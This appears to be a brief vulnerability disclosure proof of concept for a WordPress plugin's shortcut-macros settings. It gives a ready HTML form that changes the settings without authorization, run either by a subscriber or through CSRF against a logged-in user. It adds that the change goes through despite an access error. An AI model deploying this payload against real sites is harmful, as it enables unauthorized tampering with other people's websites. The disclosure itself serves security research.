Open the following HTML code while being logged in as a subscriber, or make any logged in user open it (via a CSRF attack)

<form id="test" action="" method="POST">
    <input type="text" name="ak_action" value="update_aksm_settings">
    <input type="text" name="aksm_k_1" value="aaa">
    <input type="text" name="aksm_v_1" value="hacked">
    <input type="text" name="submit_button" value="Update Shortcut Macros">

Note: Even though an error can occur, ie "Sorry, you are not allowed to access this page.", settings will be changed